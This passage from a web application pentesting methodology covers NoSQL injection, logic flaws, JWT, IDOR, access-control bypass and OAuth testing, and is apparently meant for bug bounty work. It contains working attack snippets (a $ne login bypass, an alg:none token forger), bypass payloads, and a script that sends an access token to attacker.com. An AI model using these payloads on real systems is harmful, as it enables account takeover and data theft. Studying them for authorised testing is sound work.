  - Techniques:
    - In-band (Error-based, Union-based): Results/errors are returned in the same channel.
    - Inferential (Blind - Boolean-based, Time-based): Deduce information based on true/false responses or time delays.
    - Out-of-band: Data exfiltrated via a different channel (e.g., DNS, HTTP requests triggered by database functions).
  - Tools:
    - SQLMap: Automated SQLi detection and exploitation.
  - Resources:
- NoSQL Injection:
  - Targets NoSQL databases (MongoDB, CouchDB, Cassandra, etc.). Syntax and exploitation techniques vary greatly depending on the database type and context.
  - Detection: Often involves injecting operators specific to the NoSQL database's query language (e.g., MongoDB: `$ne`, `$gt`, `$regex`, `$where` for JavaScript execution). A minimal operator-injection sketch follows this section.
  - Techniques:
    - Bypassing authentication.
    - Extracting all records.
    - Injecting JavaScript for server-side execution (e.g., MongoDB's `$where`, `mapReduce`).
  - Tools:
    - NoSQLMap: Automated NoSQL injection detection and exploitation (primarily for MongoDB).
  - Resources:
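The sketch below shows the classic MongoDB operator-injection test against a JSON login endpoint: if the backend passes the request body straight into its query, `$ne` comparisons match any document and authentication may be bypassed. The endpoint and field names are hypothetical, and it assumes the `requests` package.

```python
# Minimal sketch: MongoDB operator injection ($ne) against a hypothetical JSON login endpoint.
# Assumes `pip install requests`; only works if the backend passes the JSON body into the query unfiltered.
import requests

TARGET = "https://target.example/api/login"   # hypothetical endpoint

# Baseline request: should only succeed with valid credentials.
normal = {"username": "rs0n", "password": "wrong-password"}

# Injection: {"$ne": null} matches every document, so the first user record may authenticate.
injected = {"username": {"$ne": None}, "password": {"$ne": None}}

for label, body in (("baseline", normal), ("operator injection", injected)):
    resp = requests.post(TARGET, json=body, timeout=10)
    print(f"{label:20} status={resp.status_code} length={len(resp.text)}")
```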
Part 3: Application Logic Vulnerabilities Methodology
Goal: Send unexpected HTTP requests, or a sequence of requests, to cause the application to act in an unintended way, often bypassing security controls or exploiting flawed business logic.
Logic vulnerabilities arise when an attacker can manipulate an application's intended workflow by submitting HTTP requests (or a series of requests) that developers did not anticipate. This could involve missed access control checks, failure to validate data integrity across steps, or race conditions. A deep understanding of the application's functionality is paramount.
Section 3.1: Core Steps for Logic Testing
- Understand the Application Deeply: Spend significant time (days, if necessary) using the application as intended. Map out features, user roles, and data flows.
- Identify Complex & Critical Mechanisms: Focus on multi-step processes, features involving financial transactions, access control boundaries, and user management functions.
- Send Unexpected Sequences or Manipulated Requests: Deviate from normal usage patterns. Reorder steps, drop requests, modify parameters between steps, or replay requests out of context.
Section 3.2: Learn The Application (In-Depth Reconnaissance)
Effective logic testing hinges on a thorough understanding of the target. SaaS applications with authentication, complex access controls, varied functionality, and multi-user designs are prime candidates.
- Architecture Analysis:
* **Backend Language (PHP, Node.js, Java, Python, Ruby, etc.):**
* Language-specific quirks can influence logic.
    * **PHP `$_SESSION` vs. `$_COOKIE`:** If a developer mistakenly uses `$_COOKIE['user_id']` instead of `$_SESSION['user_id']` for sensitive identifiers, an attacker can manipulate their `user_id` cookie.
* **PHP/Node.js Loose Comparison (`==` vs. `===`):** In PHP and JavaScript, `==` performs type juggling. If `if ($userInput == true)` is used, inputs like `"1"`, `1`, or even some non-empty strings might evaluate to true. `===` checks both type and value. Look for this in authentication, authorization, or critical conditional checks. Java has a similar but distinct consideration with `==` (reference equality for objects) vs. `.equals()` (value equality).
* **Frontend Framework (React, Angular, Vue, Next.js, Svelte, etc.):**
* **Client-Side vs. Server-Side Routing/Rendering:**
* **React/Angular/Vue (Client-Side Routing):** Access controls might be partially implemented client-side (e.g., React Router hiding links). Always verify these controls server-side. If Webpack isn't obfuscated, source code might be easily reviewable.
* **Next.js/Nuxt.js (SSR/SSG):** Routing and data fetching logic can be server-side, client-side, or a hybrid. Understand where access decisions are made.
* **Client-Side NPM Packages:**
* Identify used packages (e.g., via `package.json` if exposed, or browser dev tools).
* Check for known vulnerabilities in specific versions (e.g., using Snyk Advisor, npm audit).
* Understand the package's purpose. E.g., `lodash` (older versions vulnerable to Prototype Pollution) is often used for object merging. Can you inject unexpected values into a critical JSON object via a vulnerable merge?
* **Custom Client-Side JavaScript Files:**
* These have not undergone public scrutiny like NPM packages, potentially harboring unique flaws.
* Analyze logic: conditionals, loops, event handlers, especially those dealing with user identity, roles, or permissions.
* Use tools like **JSNice** or browser built-in "pretty print" to de-minify code.
* **Authentication Mechanisms:**
* **Username/Password:**
* Test for username enumeration.
* Can you register with a username that collides or nearly collides with an existing one due to sanitization or comparison flaws (e.g., `user` vs. `user\0` or `user%00`)?
* **Email/Password:**
* **Plus Addressing (e.g., `user+alias@example.com`):** Can you create multiple accounts tied to the same inbox? How does this affect password resets, account linking, or uniqueness constraints?
* Email syntax complexity ([RFC 2822](https://datatracker.ietf.org/doc/html/rfc2822#section-3)) can lead to regex validation bypasses.
* **Single Sign-On (SSO) via SAML:**
* Understand the SAML flow (SP-initiated, IdP-initiated).
* **If you can configure SSO for the target:** Test for SAML Signature Wrapping, XXE in SAML assertions (if parsed by a vulnerable XML parser), Certificate Faking, Token Recipient Confusion. Resources: [epi's SAML blog series](https://epi052.gitlab.io/notes-to-self/tags/saml/), [OWASP SAML Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/SAML_Security_Cheat_Sheet.html). Local test IdP: [docker-test-saml-idp](https://github.com/kristophjunge/docker-test-saml-idp).
* **If you CANNOT configure SSO:** Focus on interactions between SSO and non-SSO accounts. If SSO relies on email domain for trust, can you register a non-SSO account with an email from a trusted domain (if the app allows it) and exploit inconsistencies? (e.g., [H1 Report 2101076](https://hackerone.com/reports/2101076), [H1 Report 1486417](https://hackerone.com/reports/1486417)).
* **[OAuth 2.0](https://datatracker.ietf.org/doc/html/rfc6749):**
* Recognize OAuth is an *authorization* framework, often misused for *authentication*.
* Identify the **Grant Type** (Authorization Code, Implicit, Client Credentials, Password, PKCE).
* Note all **OAuth Parameters** used (`client_id`, `redirect_uri`, `response_type`, `scope`, `state`).
* Understand *why* OAuth is used: simple sign-in, API access delegation, third-party integrations. This dictates attack vectors (e.g., insecure `redirect_uri` handling, scope escalation, CSRF against the flow). (More in OAuth Testing section).
* **Enumerable Objects in the Application:**
* Identify key data structures (Objects) the application manipulates.
* **User Object:** Contains identity info, potentially password hashes, roles, profile data. Target for IDORs (Read, Update).
* **Message Object:** If messaging exists, look for IDORs (Read others' messages, Update/Delete messages, Send as another user).
* **Financial/Sensitive Objects (Bank Account, Order, Invoice, etc.):** High impact if compromised. Focus on confidentiality (Read) and integrity (Update).
* **Session Establishment and Management:**
* How does the app identify a user across requests?
* **Cookie -> Unique Opaque String:** Most common and generally secure. Session data stored server-side. Focus on cookie flags (`Secure`, `HttpOnly`, `SameSite=Strict/Lax`), expiration, and ensuring session invalidation on logout/timeout. IDORs via session manipulation are unlikely unless the server-side mapping is flawed.
* **Cookie -> Stores Data (No Signature):** Highly vulnerable. If data in the cookie (e.g., `user_id=123;role=user`) is trusted server-side, attacker can modify it. Decode (Base64, URL) and tamper.
* **Cookie -> Stores Data (With Signature):** More secure, but check if signature validation is performed *on every endpoint* that uses the cookie data. If an endpoint misses validation, it's like "No Signature."
    * **Cookie -> JSON Web Token (JWT):** Common. Test for [known JWT attacks](https://portswigger.net/web-security/jwt): `alg:none`, signature stripping, weak secrets (brute-force HS256 secret), public key confusion (RS256 -> HS256), `kid` manipulation for arbitrary key selection/SQLi/Path Traversal. Ensure claims like `exp`, `nbf`, `iat` are validated. (A minimal `alg:none` forging sketch appears at the end of this section.)
* **localStorage/sessionStorage:** Session tokens stored here are accessible via JavaScript (XSS risk). Check how these tokens are generated, validated, and if they contain sensitive data directly. If developers assume localStorage is tamper-proof, logic flaws can arise.
* **Access Control Types Implemented:**
* **Role-Based Access Controls (RBAC):** Users assigned roles (Admin, User, Auditor). Test if users can perform actions outside their role's permissions. Check for hierarchical RBAC flaws (e.g., a "Manager" role improperly inheriting "Admin" rights).
* **Discretionary Access Controls (DAC):** Owners of resources grant access to others (e.g., Google Docs sharing, Jira project members). Test if you can access/modify resources you weren't granted access to, or escalate privileges within a shared resource. Often combined with RBAC.
* **Policy-Based Access Controls (PBAC) / Attribute-Based (ABAC):** Granular controls based on policies/attributes of user, resource, and environment. Complex to implement correctly, high chance of gaps. Test various combinations of attributes.
* **API Availability and Design:**
* **API First Design:** All data operations go via API calls. Can make enumeration easier but also means security controls might be more consistently applied.
* **Internal vs. External API:** External APIs (for third-party developers) usually have stricter auth (API keys) and documentation. Internal APIs (used by the app's own frontend) might use session cookies and be less documented publicly.
* **API Documentation (Swagger/OpenAPI, Postman Collections):** Goldmine for understanding endpoints, parameters, and expected behavior. However, always fuzz for undocumented endpoints, parameters, or HTTP methods.
* **Cross-Origin Resource Sharing (CORS) Implementation:**
* If `Access-Control-Allow-Origin` header reflects the `Origin` header from the request, or uses overly permissive wildcards (`*` with `Access-Control-Allow-Credentials: true` is bad), it can enable cross-origin attacks.
* If it allows any subdomain (e.g., `*.target.com`), look for subdomain takeovers to bypass CORS.
* Test for misconfigurations in `Access-Control-Allow-Methods`, `Access-Control-Allow-Headers`.
* **WebSockets Usage:**
* Stateful connections. Once established, the server might implicitly trust messages from that connection.
* Intercept WebSocket traffic (Burp Suite supports this). Fuzz messages for injection vulnerabilities or logic flaws specific to the WebSocket communication protocol. Are access controls re-verified for actions taken over WebSockets?
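For the JWT bullet above, one of the quickest checks is whether the backend accepts an unsigned token. The sketch below builds an `alg:none` token using only the Python standard library; the claim names are hypothetical and should mirror whatever the legitimate token actually contains.

```python
# Minimal sketch: forge an unsigned JWT to test for alg:none acceptance.
# Claim names are hypothetical; copy the structure of a real token captured from the target.
import base64
import json

def b64url(data: bytes) -> str:
    """JWTs use base64url encoding without padding."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

header = {"alg": "none", "typ": "JWT"}
claims = {"sub": "1234567890", "role": "admin"}   # hypothetical claims

# Note the trailing dot: the signature segment is intentionally empty.
token = f"{b64url(json.dumps(header).encode())}.{b64url(json.dumps(claims).encode())}."
print(token)  # send as: Authorization: Bearer <token>
```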
Section 3.3: Enumerate The Application Mechanisms
Map every user-facing and API functionality to specific HTTP requests and CRUD (Create, Read, Update, Delete) operations. Think like a Quality Engineer: How would you write automated tests for every feature? This helps identify individual test cases.
- CREATE Examples:
  - `POST /user/register --data {"username":"rs0n","password":"P@s$w0rd!"}`
    - Function: Allows unauthenticated users to create an account.
    - IDOR Potential: Usually N/A for the creation act itself.
    - Access Control Violation (ACV) Potential: N/A (designed for unauthenticated).
  - `POST /workspace --data {"name":"shared workspace 1"}` (Requires Admin role)
    - Function: Allows Admin users to create a new Workspace.
    - IDOR Potential: N/A for creation.
    - ACV Potential: High. Can a non-Admin user create a workspace?
- READ Examples:
  - `POST /user/login --data {"username":"rs0n","password":"P@s$w0rd!"}`
    - Function: Authenticates a user.
    - IDOR Potential: N/A (response depends on input, not existing identity context).
    - ACV Potential: N/A.
  - `GET /admin/user/[USER_ID]/search` (Requires Admin role in specific Workspace)
    - Function: Allows Admin to search user details within their Workspace.
    - IDOR Potential: High. Can an Admin access user info from a Workspace they don't belong to by changing `[USER_ID]` or an implicit workspace ID?
    - ACV Potential: High. Can a non-Admin access this endpoint?
- UPDATE Examples:
  - `POST /user/profile/update/username --data {"username":"rs0n_live"}`
    - Function: Allows an authenticated user to change their username.
    - IDOR Potential: High. If `user_id` is in a parameter, can it be changed to update another user? If identification is via session, this is harder, but check if the session can be fixed/hijacked.
    - ACV Potential: Low for authenticated users (all should be able to update their own). Could an unauthenticated user hit this if they spoof session data or if the auth check is missing?
  - `PATCH /workspace/[WORKSPACE_ID] --data {"description":"New desc"}`
    - Function: Allows members of a workspace to update its description.
    - IDOR Potential: High. Can a user update a workspace they are not a member of by changing `[WORKSPACE_ID]`?
    - ACV Potential: Blurry with IDOR here. Is there a specific role required even if you are a member?
- DELETE Examples:
  - `POST /user/delete --data {"username":"rs0n","password":"P@s$w0rd!","confirm":true}`
    - Function: Allows a user to delete their own account.
    - IDOR Potential: High. If identification relies on the `username` parameter or a modifiable ID, can another user's account be deleted?
    - ACV Potential: Low for own account deletion.
Section 3.4: Test The Application (Exploiting Logic Flaws)
With a deep understanding and enumerated mechanisms, begin targeted testing.
- Missing Security Controls:
* **Lack of Access Controls:** The most straightforward logic flaw: a developer simply forgot to implement an authorization check.
* **Unauthenticated -> Authenticated:** Can an unauthenticated user access `/querytool` which should be for authenticated users?
* **RBAC Failure:** Can an `Auditor` role (meant for READ-only) execute an UPDATE mechanism?
* **DAC Failure:** Can a user without explicit access to Workspace `X` still modify its description via `PATCH /workspace/X/desc`?
* **PBAC Failure:** Can a user without the `project:delete` policy still delete a project?
* **Lack of Rate Limiting:**
* Identify mechanisms that *should* have rate limits (login, password reset, voucher application, expensive computations) but don't.
* Show clear impact: Does spamming an endpoint cause denial of service for others? Does it allow brute-forcing (e.g., OTPs)? Does it cause a security control to [fail open](https://community.cisco.com/t5/security-knowledge-base/fail-open-amp-fail-close-explanation/ta-p/5012930)? (Many programs are picky about rate limiting reports without clear, direct security impact beyond resource consumption).
- Bypass Existing Security Controls:
* **[Bypassing Access Controls (401/403 Bypasses)](https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/403-and-401-bypasses):**
* **IP Address Restrictions:** Try using HTTP Proxy Headers (`X-Forwarded-For`, `X-Real-IP`, `Forwarded`, etc.) to spoof source IP. Look for SSRF vulnerabilities that allow requests from an internal IP.
* **Path Fuzzing/Normalization:** If `/admin/login` is forbidden:
* Try case changes: `/ADMIN/LOGIN`, `/Admin/Login`.
* Path traversal/manipulation: `/admin/./login`, `/admin//login`, `/admin;/login`, `/admin/login/.`, `/%2e/admin/login`, `/admin%20/login`.
* Use tools like Burp's `403Bypasser` extension or `ffuf` with path fuzzing wordlists.
* **Unexpected Access Patterns/Host Header Manipulation:** Access via IP address instead of FQDN. If CNAME exists, try both domains. Try HTTP on HTTPS endpoints (port 80). Downgrade HTTP/2 to HTTP/1.1. Manipulate the `Host` header.
* **Hidden Parameters:** Add parameters like `isAdmin=true`, `debug=true`, `role=admin`.
* **Change HTTP Method:** Try `GET` if `POST` is blocked, or `PUT`, `PATCH`, `DELETE`.
* **[Bypassing Rate Limiting](https://book.hacktricks.xyz/pentesting-web/rate-limit-bypass):**
* **User Account Based:** If rate limiting is tied to user ID/username, can you change your user ID (e.g., if it's in a parameter) or re-register to get a new quota?
* **IP Address Based:**
* Use proxy headers (`X-Forwarded-For`, etc.). Some systems might pick the first IP, last IP, or a specific one if multiple are provided.
* Use a distributed network of proxies/VPNs.
* Append null bytes or special characters to the IP if it's being processed as a string.
* IPv6 variations if IPv4 is blocked (`::ffff:1.2.3.4`).
* **[Bypassing 2FA/MFA](https://book.hacktricks.xyz/pentesting-web/2fa-bypass):**
* **Response Manipulation:** After submitting username/password, if the server responds with "2FA required," can you modify this response client-side (if client trusts it) or capture a later request and remove 2FA-related parameters?
* **Direct Access to Post-2FA Pages:** Can you skip the 2FA page and directly browse to an application page that assumes 2FA was completed?
* **Token Leakage/Replay:** Is the 2FA token leaked in a URL or response? Can it be replayed? Is there a lack of rate limiting on 2FA code submission?
* **Backup Code Flaws:** Weak backup codes, or ability to generate/reuse them insecurely.
* OAUTH/SSO Misconfiguration bypassing 2FA for primary authentication.
* CSRF on 2FA disabling.
* **[Bypassing Payment Process Restrictions](https://book.hacktricks.xyz/pentesting-web/bypass-payment-process):**
* **Price Manipulation:** Change item price or quantity parameters to negative numbers or zero.
* **Currency Manipulation:** Change currency to a cheaper one if not validated.
* **Tamper with Total Amount:** If the total amount is sent as a parameter, modify it.
* **Interrupt Payment Flow:** Can you complete an order by dropping the final request to the payment gateway but still having the application mark the order as paid? (Race conditions).
* **Voucher/Discount Abuse:** Apply multiple discounts, reuse single-use vouchers, or apply expired ones.
* **[Bypassing Registration Restrictions](https://book.hacktricks.xyz/pentesting-web/registration-vulnerabilities):**
* Use character encoding or case variations to bypass username/email blocklists.
* Exploit parameter pollution if registration data is sent in multiple places.
* If registration requires an invite code, try to brute-force it or find a logic flaw that bypasses the check.
* Register with an email address that has the same unique identifier as an existing account but uses allowed variations (e.g., `user.name@gmail.com` vs. `username@gmail.com`, or `user+victim@example.com`).
* **[Bypassing Password Reset Restrictions](https://book.hacktricks.xyz/pentesting-web/reset-password):**
* **Host Header Poisoning:** If the password reset link is generated using the `Host` header, manipulate it to point to your server to capture the reset token. Test with `X-Forwarded-Host` as well.
* **Token Leakage:** Is the reset token leaked via `Referer` header to third parties?
* **Weak Token Generation/No Rate Limiting:** Brute-force short or predictable reset tokens.
* **Parameter Tampering:** In the final step of setting a new password, can you change a `user_id` parameter to reset someone else's password if the token validation is tied only to the token itself and not the user it was issued for?
* **Response Manipulation:** After entering the email, if the server returns the security questions, can you bypass this step?
- Insecure Direct Object References (IDOR):
* **Summary:** IDORs occur when an application uses user-supplied input (e.g., an ID in a URL or request body) to access objects directly without verifying if the logged-in user is authorized to access that specific object.
* *Reference: [YouTube Video - [Part I] Bug Bounty Hunting for IDORs and Access Control Violations](https://youtu.be/BfbS8uRjeAg)* (Placeholder)
* *Reference: [YouTube Video - Ask Yourself These Four Questions When Bug Bounty Hunting for IDORs](https://youtu.be/4h42AFrpyK0)* (Placeholder)
* **Basic IDOR Hunting Steps:**
1. **Identify Mechanisms:** Find all functionalities that perform READ, UPDATE, or DELETE operations on specific objects (e.g., view profile, edit message, delete document).
2. **Locate Identifiers:** Determine how the object being accessed is identified:
* **From Session Token (Implicit):** E.g., `/profile/me` fetches the current user's profile. Harder to find IDORs unless session can be manipulated or there's an internal mapping flaw.
* **From Signed/Encrypted Identifier:** E.g., a JWT claim or an encrypted ID. You'd need to break the signature/encryption first, or find flaws in how it's processed.
* **From User-Controlled Parameter (Explicit):** E.g., `GET /users?id=123`, `POST /messages/delete` with `{"message_id": 456}`. This is the most common IDOR vector. Also check for UUIDs, usernames, emails, or even less obvious sequential identifiers.
3. **Obtain Other Users' Identifiers:** Create multiple accounts or find ways to enumerate/guess identifiers of other users/objects you shouldn't have access to.
    4. **Test Authorization:** Substitute the victim's identifier into the request and see if you can access/modify their data. Check all CRUD operations. (A minimal two-session check sketch appears at the end of this section.)
* **Key Questions for IDOR Hunting per Mechanism:**
* *Does the endpoint's response vary based on the client's identity for the same object ID (unlikely for IDOR, more for ACV)?* More relevant: *Does the endpoint return different objects based on an ID I control?*
* *Does the endpoint identify the client implicitly via a session token (making IDORs on that object harder), or explicitly via an ID in the request?*
* *If an ID is used, is it signed/encrypted (requiring more steps) or plaintext/guessable?*
* *Is the ID pulled directly from a parameter, header, or cookie value I control?*
- OAuth 2.0 Testing:
* **Summary:** OAuth is complex, with various grant types and optional parameters, making misconfigurations common. It's an authorization framework, often misused for authentication.
* **Key Areas:** `redirect_uri` validation, `state` parameter usage, scope handling, client authentication (for confidential clients).
* **Steps of OAuth (Focus on Authorization Code Grant):**
1. **Authorization Request (Client to Authorization Server):**
```
    GET /authorization?client_id=12345&redirect_uri=https://client-app.com/callback&response_type=code&scope=openid%20profile&state=ae13d489bd00e3c24 HTTP/1.1
Host: oauth-authorization-server.com
```
* **Test Points:**
* `redirect_uri`: Is it strictly validated? (See below)
* `response_type`: Can it be changed to `token` (Implicit grant) if not intended?
* `scope`: Are overly broad scopes requested or accepted?
* `state`: Is it present and non-guessable? (Prevents CSRF)
2. **User Consent (User authenticates and approves at Authorization Server).**
3. **Authorization Code Grant (Authorization Server to Client via redirect):**
```
    GET https://client-app.com/callback?code=a1b2c3d4e5f6g7h8&state=ae13d489bd00e3c24 HTTP/1.1
Host: client-app.com
```
* **Test Points:**
* Is the `code` short-lived and one-time use?
* Is the `state` parameter validated by the client against the original one? If not, CSRF is possible (e.g., attacker tricks victim into linking attacker's account from OAuth provider to victim's client app account).
4. **Access Token Request (Client to Authorization Server - backend):**
```
POST /token HTTP/1.1
Host: oauth-authorization-server.com
...
    client_id=12345&client_secret=SECRET&redirect_uri=https://client-app.com/callback&grant_type=authorization_code&code=a1b2c3d4e5f6g7h8
```
* **Test Points:**
* `client_secret`: For confidential clients. Is it leaked?
* `redirect_uri`: Does the Authorization Server re-validate it here against the initial one?
* `code`: Is it validated properly?
* `grant_type`: Correct for the flow.
5. **Access Token Grant (Authorization Server to Client):**
* Server responds with Bearer Token (Access Token, potentially Refresh Token, ID Token).
6. **API Call (Client to Resource Server):**
* Client uses Access Token in `Authorization: Bearer <token>` header.
7. **Resource Grant (Resource Server to Client):**
* Resource server validates token and returns data.
* **OAuth Hunting Steps:**
1. **Discover OAuth Flows:** Search HTTP traffic for OAuth parameters (`client_id`, `redirect_uri`, `response_type`, `state`, `scope`).
2. **Identify Authorization Server Endpoints:** Look for well-known URIs:
* `/.well-known/oauth-authorization-server`
* `/.well-known/openid-configuration` (for OpenID Connect, built on OAuth)
3. **Identify Grant Type:** Primarily from `response_type` (`code` for Auth Code, `token` for Implicit).
4. **Test for Common Misconfigurations:**
* **Implicit Grant Issues (`response_type=token`):** Access token is passed in URL fragment. Higher risk of leakage (browser history, Referer). If used for authentication, any data in the initial POST request to the client app might not be validated against the OAuth identity.
* **Missing/Weak `state` Parameter (Auth Code Grant):** Leads to CSRF on the callback, allowing an attacker to link their OAuth provider account to the victim's client application account.
* **Stealing `code`/`token` via `redirect_uri`:**
* **No/Weak Validation:** If `redirect_uri` is not validated or loosely validated, an attacker can set it to their own domain/path.
* **Redirect Possibilities/Bypass Techniques:**
1. Any domain: `redirect_uri=https://attacker.com`
2. Any subdomain: `redirect_uri=https://attacker.victim.com` (if `victim.com` is trusted, look for subdomain takeover).
3. Specific domains (Whitelist): Check if any whitelisted domains have open redirect vulnerabilities or allow user content that can steal tokens.
4. Path Traversal: `redirect_uri=https://client-app.com/legit_path/../../attacker_path`
5. Different Scheme: `redirect_uri=javascript:alert(document.domain)` (unlikely but possible).
6. Parameter Pollution/Appending: `redirect_uri=https://client-app.com/callback?attacker_param=foo` or using `#` to inject data.
7. Regex bypasses for whitelist validation (e.g., `https://client-app.com.attacker.com` if regex is `^https://client-app\.com`).
* **Exploitation:** Attacker crafts a malicious link with a poisoned `redirect_uri`. Victim clicks, authenticates, and the `code` or `token` is sent to the attacker's controlled URI.
* ***Note:*** If `redirect_uri` parameter is *also* sent in the Access Token Request (Step 4) and validated by the Authorization Server against the initial `redirect_uri`, this mitigates `code` theft for that step.
* **Stealing Data from URL Hash Fragments (`#`):** If a token is in the fragment (`#access_token=...`), it's not sent to the server. Client-side script processes it. If this script insecurely sends fragment data to another server (e.g., via `<img>` src, or XHR to attacker site), it can be stolen. Example vulnerable script:
```javascript
    // Vulnerable script on client-app.com/callback
if (document.location.hash) {
var params = new URLSearchParams(document.location.hash.substr(1));
// If token is sent to an attacker-controlled logger or image
    new Image().src = 'https://attacker.com/log?token=' + params.get('access_token');
}
```
* **Scope Escalation/Misconfiguration:**
* **Authorization Code Grant:** Malicious client registers with limited scope, victim approves. Client then requests an access token from `/token` endpoint but specifies expanded scopes. If AS doesn't validate requested scopes against originally approved ones, it might issue an over-privileged token.
* **Implicit Grant:** If an attacker steals a token, they might try using it for scopes the user didn't explicitly grant, if the resource server doesn't properly validate scopes per token.
* **Account Takeover via OAuth Registration/Login:**
* If an application allows "Sign up with X Provider" and "Log in with X Provider," check for logic flaws. If the email from the OAuth provider is used as the primary identifier, can an attacker:
1. Create an account on the OAuth provider with the victim's email (if possible).
2. Then use "Sign up with X Provider" on the client app to link to victim's (potentially existing) account or create a new one under victim's email.
* **OpenID Connect (OIDC) Specifics (often used with OAuth):**
* Uses **ID Tokens (JWTs)** for identity information.
* `id_token` contains claims about the user. Validate its signature and claims (`iss`, `aud`, `exp`, `nonce`).
* Keys for JWT signature validation often exposed at `/.well-known/jwks.json` (from OIDC provider).
* OIDC provider configuration usually at `/.well-known/openid-configuration`.
* `response_type` can be combined: `id_token token` (Implicit), `id_token code`.
* **Dynamic Client Registration:** If the OIDC provider allows clients (applications) to register dynamically, check if this registration process is authenticated or can be abused for SSRF (e.g., if `logo_uri` or `jwks_uri` parameters in registration are fetched server-side by the OIDC provider).
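Closing out the IDOR hunting steps earlier in this section, the sketch below captures the core test: request an object owned by a second (victim) test account while authenticated as the attacker account, and compare the result against the expected denial. Endpoint, cookie name, and IDs are hypothetical placeholders; it assumes the `requests` package.

```python
# Minimal sketch: two-session IDOR check against a hypothetical object endpoint.
# Assumes `pip install requests`; endpoint, cookie name, and IDs are placeholders.
import requests

BASE = "https://target.example"
ATTACKER_COOKIE = {"session": "ATTACKER_SESSION_TOKEN"}
VICTIM_OBJECT_ID = "1337"   # an object ID owned by a second test account you control

def fetch_as_attacker(object_id: str) -> requests.Response:
    """Request the victim's object while authenticated as the attacker account."""
    return requests.get(f"{BASE}/api/messages/{object_id}", cookies=ATTACKER_COOKIE, timeout=10)

if __name__ == "__main__":
    resp = fetch_as_attacker(VICTIM_OBJECT_ID)
    if resp.status_code == 200:
        print("Possible IDOR: attacker session retrieved the victim's object")
        print(resp.text[:200])
    else:
        print(f"Access denied as expected (status {resp.status_code})")
```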